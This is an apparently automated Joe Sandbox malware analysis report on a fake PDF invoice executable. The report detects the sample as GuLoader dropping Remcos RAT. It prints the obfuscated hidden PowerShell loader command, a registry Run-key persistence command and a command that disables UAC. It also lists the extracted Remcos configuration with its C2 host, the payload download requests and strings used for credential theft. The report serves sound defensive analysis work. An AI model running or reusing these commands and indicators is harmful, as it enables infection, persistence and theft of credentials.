Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Vyuctovani_2024_07-1206812497#U00b7pdf.exe

Overview

General Information

Sample name:Vyuctovani_2024_07-1206812497#U00b7pdf.exe
renamed because original name is a hash value
Original sample name:Vyuctovani_2024_07-1206812497pdf.exe
Analysis ID:1465858
MD5:3fb7cb8d7fd9efd2bc0cae35eb42c4fe
SHA1:ce06ab538757edb9b1d4cce656006da0d3795bb1
SHA256:705d13694a98f8bbe7624d27646e60af6586e1598fcca6464414ded3ae43d1f5
Tags:exe
Infos:

Detection

Remcos, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected Remcos RAT
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Yara detected GuLoader
Yara detected Remcos RAT
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Disables UAC (registry)
Found suspicious powershell code related to unpacking or dynamic code loading
Installs a global keyboard hook
Maps a DLL or memory area into another process
Powershell drops PE file
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Uses cmd line tools excessively to alter registry or file data
Uses dynamic DNS services
Writes to foreign memory regions
Yara detected WebBrowserPassView password recovery tool
Abnormal high CPU Usage
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Sigma detected: Use Short Name Path in Command Line
Sleep loop found (likely to delay execution)
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64
  • Vyuctovani_2024_07-1206812497#U00b7pdf.exe (PID: 5568 cmdline: "C:\Users\user\Desktop\Vyuctovani_2024_07-1206812497#U00b7pdf.exe" MD5: 3FB7CB8D7FD9EFD2BC0CAE35EB42C4FE)
    • powershell.exe (PID: 4836 cmdline: "powershell.exe" -windowstyle hidden "$Repowered144=Get-Content 'C:\Users\user\AppData\Local\twinsomeness\Telefonsvarer\Svenskheds.Gre28';$Thiohydrate=$Repowered144.SubString(6682,3);.$Thiohydrate($Repowered144)" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 3092 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • Nubilum.exe (PID: 7688 cmdline: "C:\Users\user~1\AppData\Local\Temp\Nubilum.exe" MD5: 3FB7CB8D7FD9EFD2BC0CAE35EB42C4FE)
        • cmd.exe (PID: 7772 cmdline: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "husmndenes" /t REG_EXPAND_SZ /d "%tomboyism% -windowstyle minimized $Eftertaklede=(Get-ItemProperty -Path 'HKCU:\Bukkespringenes\').Hovedstads;%tomboyism% ($Eftertaklede)" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 7780 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • reg.exe (PID: 7824 cmdline: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "husmndenes" /t REG_EXPAND_SZ /d "%tomboyism% -windowstyle minimized $Eftertaklede=(Get-ItemProperty -Path 'HKCU:\Bukkespringenes\').Hovedstads;%tomboyism% ($Eftertaklede)" MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
        • cmd.exe (PID: 7900 cmdline: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 7924 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • reg.exe (PID: 7964 cmdline: C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
        • Nubilum.exe (PID: 1912 cmdline: C:\Users\user~1\AppData\Local\Temp\Nubilum.exe /stext "C:\Users\user\AppData\Local\Temp\avtrjqntogc" MD5: 3FB7CB8D7FD9EFD2BC0CAE35EB42C4FE)
        • Nubilum.exe (PID: 744 cmdline: C:\Users\user~1\AppData\Local\Temp\Nubilum.exe /stext "C:\Users\user\AppData\Local\Temp\cpykjjxvcoutma" MD5: 3FB7CB8D7FD9EFD2BC0CAE35EB42C4FE)
        • Nubilum.exe (PID: 6184 cmdline: C:\Users\user~1\AppData\Local\Temp\Nubilum.exe /stext "C:\Users\user\AppData\Local\Temp\nrdukbioqxmyohrux" MD5: 3FB7CB8D7FD9EFD2BC0CAE35EB42C4FE)
  • svchost.exe (PID: 8104 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
{"Host:Port:Password": "a458386d9.duckdns.org:3256:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-7CSH4D", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Enable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
SourceRuleDescriptionAuthorStrings
00000010.00000002.3682803915.00000000027FA000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
    00000010.00000002.3682803915.000000000280F000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      00000010.00000002.3682803915.0000000002821000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
        00000010.00000003.1715093948.000000000281E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
          00000010.00000003.1676138681.0000000002821000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
            Click to see the 6 entries

            System Summary

            barindex
            Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: %tomboyism% -windowstyle minimized $Eftertaklede=(Get-ItemProperty -Path 'HKCU:\Bukkespringenes\').Hovedstads;%tomboyism% ($Eftertaklede), EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\reg.exe, ProcessId: 7824, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\husmndenes
            Source: Process startedAuthor: Victor Sergeev, Daniil Yugoslavskiy, oscd.community: Data: Command: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "husmndenes" /t REG_EXPAND_SZ /d "%tomboyism% -windowstyle minimized $Eftertaklede=(Get-ItemProperty -Path 'HKCU:\Bukkespringenes\').Hovedstads;%tomboyism% ($Eftertaklede)", CommandLine: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "husmndenes" /t REG_EXPAND_SZ /d "%tomboyism% -windowstyle minimized $Eftertaklede=(Get-ItemProperty -Path 'HKCU:\Bukkespringenes\').Hovedstads;%tomboyism% ($Eftertaklede)", CommandLine|base64offset|contains: DA, Image: C:\Windows\SysWOW64\reg.exe, NewProcessName: C:\Windows\SysWOW64\reg.exe, OriginalFileName: C:\Windows\SysWOW64\reg.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "husmndenes" /t REG_EXPAND_SZ /d "%tomboyism% -windowstyle minimized $Eftertaklede=(Get-ItemProperty -Path 'HKCU:\Bukkespringenes\').Hovedstads;%tomboyism% ($Eftertaklede)", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7772, ParentProcessName: cmd.exe, ProcessCommandLine: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "husmndenes" /t REG_EXPAND_SZ /d "%tomboyism% -windowstyle minimized $Eftertaklede=(Get-ItemProperty -Path 'HKCU:\Bukkespringenes\').Hovedstads;%tomboyism% ($Eftertaklede)", ProcessId: 7824, ProcessName: reg.exe
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "husmndenes" /t REG_EXPAND_SZ /d "%tomboyism% -windowstyle minimized $Eftertaklede=(Get-ItemProperty -Path 'HKCU:\Bukkespringenes\').Hovedstads;%tomboyism% ($Eftertaklede)", CommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "husmndenes" /t REG_EXPAND_SZ /d "%tomboyism% -windowstyle minimized $Eftertaklede=(Get-ItemProperty -Path 'HKCU:\Bukkespringenes\').Hovedstads;%tomboyism% ($Eftertaklede)", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user~1\AppData\Local\Temp\Nubilum.exe", ParentImage: C:\Users\user\AppData\Local\Temp\Nubilum.exe, ParentProcessId: 7688, ParentProcessName: Nubilum.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "husmndenes" /t REG_EXPAND_SZ /d "%tomboyism% -windowstyle minimized $Eftertaklede=(Get-ItemProperty -Path 'HKCU:\Bukkespringenes\').Hovedstads;%tomboyism% ($Eftertaklede)", ProcessId: 7772, ProcessName: cmd.exe
            Source: Process startedAuthor: frack113, Nasreddine Bencherchali: Data: Command: "C:\Users\user~1\AppData\Local\Temp\Nubilum.exe", CommandLine: "C:\Users\user~1\AppData\Local\Temp\Nubilum.exe", CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\Nubilum.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\Nubilum.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\Nubilum.exe, ParentCommandLine: "powershell.exe" -windowstyle hidden "$Repowered144=Get-Content 'C:\Users\user\AppData\Local\twinsomeness\Telefonsvarer\Svenskheds.Gre28';$Thiohydrate=$Repowered144.SubString(6682,3);.$Thiohydrate($Repowered144)", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 4836, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Users\user~1\AppData\Local\Temp\Nubilum.exe", ProcessId: 7688, ProcessName: Nubilum.exe
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" -windowstyle hidden "$Repowered144=Get-Content 'C:\Users\user\AppData\Local\twinsomeness\Telefonsvarer\Svenskheds.Gre28';$Thiohydrate=$Repowered144.SubString(6682,3);.$Thiohydrate($Repowered144)", CommandLine: "powershell.exe" -windowstyle hidden "$Repowered144=Get-Content 'C:\Users\user\AppData\Local\twinsomeness\Telefonsvarer\Svenskheds.Gre28';$Thiohydrate=$Repowered144.SubString(6682,3);.$Thiohydrate($Repowered144)", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Vyuctovani_2024_07-1206812497#U00b7pdf.exe", ParentImage: C:\Users\user\Desktop\Vyuctovani_2024_07-1206812497#U00b7pdf.exe, ParentProcessId: 5568, ParentProcessName: Vyuctovani_2024_07-1206812497#U00b7pdf.exe, ProcessCommandLine: "powershell.exe" -windowstyle hidden "$Repowered144=Get-Content 'C:\Users\user\AppData\Local\twinsomeness\Telefonsvarer\Svenskheds.Gre28';$Thiohydrate=$Repowered144.SubString(6682,3);.$Thiohydrate($Repowered144)", ProcessId: 4836, ProcessName: powershell.exe
            Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 624, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 8104, ProcessName: svchost.exe

            Stealing of Sensitive Information

            barindex
            Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\Nubilum.exe, ProcessId: 7688, TargetFilename: C:\ProgramData\remcos\logs.dat
            No Snort rule has matched

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: 00000010.00000002.3682803915.00000000027FA000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": "a458386d9.duckdns.org:3256:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-7CSH4D", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Enable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
            Source: a458386d9.duckdns.orgVirustotal: Detection: 12%Perma Link
            Source: a458386d9.duckdns.orgVirustotal: Detection: 12%Perma Link
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeReversingLabs: Detection: 21%
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeVirustotal: Detection: 14%Perma Link
            Source: Vyuctovani_2024_07-1206812497#U00b7pdf.exeVirustotal: Detection: 14%Perma Link
            Source: Vyuctovani_2024_07-1206812497#U00b7pdf.exeReversingLabs: Detection: 29%
            Source: Yara matchFile source: 00000010.00000002.3682803915.00000000027FA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000002.3682803915.000000000280F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000002.3682803915.0000000002821000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000003.1715093948.000000000281E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000003.1676138681.0000000002821000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000003.1685824028.000000000281E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Nubilum.exe PID: 7688, type: MEMORYSTR
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeCode function: 28_2_00404423 GetProcAddress,FreeLibrary,CryptUnprotectData,28_2_00404423
            Source: Vyuctovani_2024_07-1206812497#U00b7pdf.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: unknownHTTPS traffic detected: 142.250.186.174:443 -> 192.168.2.7:49707 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.186.161:443 -> 192.168.2.7:49708 version: TLS 1.2
            Source: Vyuctovani_2024_07-1206812497#U00b7pdf.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: C:\Users\user\Desktop\Vyuctovani_2024_07-1206812497#U00b7pdf.exeCode function: 0_2_00406404 FindFirstFileW,FindClose,0_2_00406404
            Source: C:\Users\user\Desktop\Vyuctovani_2024_07-1206812497#U00b7pdf.exeCode function: 0_2_004058B2 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_004058B2
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeCode function: 16_2_1FAB10F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,16_2_1FAB10F1
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeCode function: 16_2_1FAB6580 FindFirstFileExA,16_2_1FAB6580
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeCode function: 28_2_0040AE51 FindFirstFileW,FindNextFileW,28_2_0040AE51
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeCode function: 29_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,29_2_00407EF8
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeCode function: 30_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,30_2_00407898
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeFile opened: C:\Users\user~1\Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeFile opened: C:\Users\user\AppData\Local\Temp\cpykjjxvcoutmaJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeFile opened: C:\Users\user\AppData\Local\Temp\nrdukbioqxmyohruxJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeFile opened: C:\Users\user~1\AppData\Local\Temp\Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeFile opened: C:\Users\user~1\AppData\Local\Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeFile opened: C:\Users\user~1\AppData\Jump to behavior

            Networking

            barindex
            Source: Malware configuration extractorURLs: a458386d9.duckdns.org
            Source: unknownDNS query: name: a458386d9.duckdns.org
            Source: global trafficTCP traffic: 192.168.2.7:49709 -> 217.76.50.73:3256
            Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
            Source: Joe Sandbox ViewIP Address: 217.76.50.73 217.76.50.73
            Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
            Source: Joe Sandbox ViewASN Name: SVNET-SE-ASSverigeNetMedianetworkiHalmstadABSE SVNET-SE-ASSverigeNetMedianetworkiHalmstadABSE
            Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1q5MPREU5yWi7dFoB9M6udfakDC8MLk5B HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /download?id=1q5MPREU5yWi7dFoB9M6udfakDC8MLk5B&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1q5MPREU5yWi7dFoB9M6udfakDC8MLk5B HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /download?id=1q5MPREU5yWi7dFoB9M6udfakDC8MLk5B&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
            Source: Nubilum.exe, 0000001C.00000003.1711574673.0000000000AE9000.00000004.00000020.00020000.00000000.sdmp, Nubilum.exe, 0000001C.00000002.1713385295.0000000000AE9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ://192.168.2.1/all/install/setup.au3https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srffile:///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
            Source: Nubilum.exe, 0000001C.00000003.1711574673.0000000000AE9000.00000004.00000020.00020000.00000000.sdmp, Nubilum.exe, 0000001C.00000002.1713385295.0000000000AE9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ://192.168.2.1/all/install/setup.au3https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srffile:///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
            Source: Nubilum.exe, 00000010.00000002.3696316061.000000001FA80000.00000040.10000000.00040000.00000000.sdmp, Nubilum.exe, 0000001E.00000002.1695114203.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
            Source: Nubilum.exe, Nubilum.exe, 0000001E.00000002.1695114203.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
            Source: Nubilum.exeString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
            Source: Nubilum.exe, 00000010.00000002.3695789252.000000001F110000.00000040.10000000.00040000.00000000.sdmp, Nubilum.exe, 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
            Source: Nubilum.exe, 00000010.00000002.3695789252.000000001F110000.00000040.10000000.00040000.00000000.sdmp, Nubilum.exe, 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
            Source: global trafficDNS traffic detected: DNS query: drive.google.com
            Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
            Source: global trafficDNS traffic detected: DNS query: a458386d9.duckdns.org
            Source: global trafficDNS traffic detected: DNS query: geoplugin.net
            Source: bhvCBB3.tmp.28.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
            Source: bhvCBB3.tmp.28.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
            Source: svchost.exe, 00000018.00000002.3274791143.000002CE97600000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
            Source: bhvCBB3.tmp.28.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
            Source: bhvCBB3.tmp.28.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
            Source: bhvCBB3.tmp.28.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
            Source: qmgr.db.24.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
            Source: qmgr.db.24.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
            Source: qmgr.db.24.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
            Source: qmgr.db.24.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
            Source: qmgr.db.24.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
            Source: qmgr.db.24.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
            Source: edb.log.24.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
            Source: Nubilum.exe, 00000010.00000002.3682803915.0000000002821000.00000004.00000020.00020000.00000000.sdmp, Nubilum.exe, 00000010.00000003.1715093948.000000000281E000.00000004.00000020.00020000.00000000.sdmp, Nubilum.exe, 00000010.00000003.1676138681.0000000002821000.00000004.00000020.00020000.00000000.sdmp, Nubilum.exe, 00000010.00000003.1685824028.000000000281E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/
